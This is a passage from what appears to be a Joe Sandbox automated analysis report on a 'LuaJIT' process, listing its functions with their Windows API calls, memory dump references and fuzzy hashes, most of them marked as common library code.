                                                                                                                                                                        • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF738B167C7,?,?,?,?,00000000,COMSPEC,?,00007FF738B169AE), ref: 00007FF738B16A43
                                                                                                                                                                        • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF738B167C7,?,?,?,?,00000000,COMSPEC,?,00007FF738B169AE), ref: 00007FF738B16A8F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                                                        • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                        • Instruction ID: b9965d9984b12bffd05f67e5aa2f25eaae5d2f1f2ae9960843bd55e5abbb4996
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E811763F0C68365F765AF25D44117AF6A2EB12740FC44036D68E0B690DE3FF545A32A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFB120 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction ID: 5a9529750e977e6515c00f99ebbbfb1ac99c2fc5be1a330e7be234bc95560ab3
                                                                                                                                                                        • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51BC33B0B15255F664BE259C00E7AE6E1BB44BA4F944332DD6C477D5CF3EE402A628
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ADD400 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3548387204-0
                                                                                                                                                                        • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                        • Instruction ID: 3c6e042d36901b92be1c7869e38c1773d740d7b65eec6935fffd6fefa2012d50
                                                                                                                                                                        • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                        • Instruction Fuzzy Hash: 57118D97E0A903A2FA5476B04866BBCC1545F51344FC01434E52DD6AC3DE3FB949A23A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0D5D8 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF738B0D50B,?,?,00000000,00007FF738B0D5B3,?,?,?,?,?,?,00007FF738AFAF6A), ref: 00007FF738B0D63E
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF738B0D50B,?,?,00000000,00007FF738B0D5B3,?,?,?,?,?,?,00007FF738AFAF6A), ref: 00007FF738B0D648
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1687624791-0
                                                                                                                                                                        • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                        • Instruction ID: 1315cb8d72b599e26d6520144f252e3ac0c7e5b57b902b16842eb57a3d740c6d
                                                                                                                                                                        • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                        • Instruction Fuzzy Hash: 96118E92F0968361EA5476649890679D2826F847A4F880335E93E4B2D6CF7EA440A22B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B10728 Relevance: 3.0, APIs: 2, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00007FF738B0CE7B,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B106C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF738B0CE7B,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B106D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                        • Opcode ID: ce9c87b8e086668eb34a44c81d26ffbadf1ed6bf51d5273b0643082e019e2796
                                                                                                                                                                        • Instruction ID: 87cca56fa2f7d51173a94b7f40f364f3be89d15e6fbdd657e79ff281b839e3d0
                                                                                                                                                                        • Opcode Fuzzy Hash: ce9c87b8e086668eb34a44c81d26ffbadf1ed6bf51d5273b0643082e019e2796
                                                                                                                                                                        • Instruction Fuzzy Hash: A911C663B1CB8351DE10A726A84407DE222AB84BF0BD40331E93E0B7D8DE3DE452A715
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ABF080 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                        • Instruction ID: 7fb44e4dfb68e937f2e97e59a54de27df639c170251711a1743726efea62ed76
                                                                                                                                                                        • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                        • Instruction Fuzzy Hash: 30114832908A4693D621AB54E480729F3B0F788768F940231E69E437F8DF3ED945DB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B07A6A Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ;$n
                                                                                                                                                                        • API String ID: 0-2359131802
                                                                                                                                                                        • Opcode ID: a8918e1d8db0d15dd890f9ec76c7c461a5698f93455ba63284a487f5ad53ba70
                                                                                                                                                                        • Instruction ID: 9d5f1593326e78b544c145f88f0c30ba6913e34a793d8afae3cc33852509bb8f
                                                                                                                                                                        • Opcode Fuzzy Hash: a8918e1d8db0d15dd890f9ec76c7c461a5698f93455ba63284a487f5ad53ba70
                                                                                                                                                                        • Instruction Fuzzy Hash: 5851D93181895F5BEB95AF258888EA0F391FF14315FC04274C808D75D5EB34B995E7E2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A42DC0 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                        • Opcode ID: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                                                                                                                                        • Instruction ID: 7b651581ddc30569455e9462e9cce0968951af010c7a98fc29a490e9f4859316
                                                                                                                                                                        • Opcode Fuzzy Hash: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                                                                                                                                        • Instruction Fuzzy Hash: D6711733619B8586CB60DB1AE48076AF7A0F7C8B90F544235EA9D87BA8DE3DD440CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A4CAF0 Relevance: 1.7, APIs: 1, Instructions: 217stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 6698cab11dcdf472175319ca2dc2c7f576ac6a670256202f22260dff448593ab
                                                                                                                                                                        • Instruction ID: 353d764666c28453c4767af1337b4aa6bd78e2446f994f582834b45ec30110a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 6698cab11dcdf472175319ca2dc2c7f576ac6a670256202f22260dff448593ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BB1193360DA818ADA70DB19E48076AF7A0F7C9B98F444226EA9D83B59DF3DD541CF04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B01290 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 51b45f4f2e914d10d61072481e6ba082d454b860a929ad620602fe75d6a0c9cb
                                                                                                                                                                        • Instruction ID: afda3d802af9c99d2f57187372a67497510cfc857f2529976ca68bfa26f97675
                                                                                                                                                                        • Opcode Fuzzy Hash: 51b45f4f2e914d10d61072481e6ba082d454b860a929ad620602fe75d6a0c9cb
                                                                                                                                                                        • Instruction Fuzzy Hash: B441E8A2B0824365EA5CAD26550093DF281AF05FE4F844234EE3D47BD5DF3DF441962B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A64C00 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2882679554-0
                                                                                                                                                                        • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                        • Instruction ID: 2a3ac4f136e2de9487779264ef54e877771706196858faeeff0a7c14b40e9000
                                                                                                                                                                        • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                        • Instruction Fuzzy Hash: 5151E93761AB4992DB20EB1AE49012EF7B1F7C9B94F500232EA8D47B68CF3DD5518B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0E7D8 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                                                                                                                                        • Instruction ID: e6805bcfc072163112ba83f490393e2e6650163eaa4e7e288a58767effebe723
                                                                                                                                                                        • Opcode Fuzzy Hash: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                                                                                                                                        • Instruction Fuzzy Hash: DD412773A09242A7EE54AB58D640678F3A0FB41784F900131DB6D47791CF3AF462E367
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A4DFF0 Relevance: 1.6, APIs: 1, Instructions: 102stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 89b1068a0023759cda3ceb920f6e8c1857f0eae96593cfe7be954dcf565d8c29
                                                                                                                                                                        • Instruction ID: f373f892a67e234ce299603a4e302dde3a2036475900e371567da88c6a3d9aff
                                                                                                                                                                        • Opcode Fuzzy Hash: 89b1068a0023759cda3ceb920f6e8c1857f0eae96593cfe7be954dcf565d8c29
                                                                                                                                                                        • Instruction Fuzzy Hash: A051C636619B98C6DB60DB0AE49031AFBA0F7C8B98F144225EADD47B69CB7DC150CF04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0E0C0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                        • Instruction ID: dfe7012872eb23be196b0b40a509cd0a005f74ccfb5d9b9fae76e1502ef98a49
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A31DE73A09212A6EB407B54C841BBDE650AF84BA5FD40136D92C033D2CFBEB440A73B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0CCF8 Relevance: 1.6, APIs: 1, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
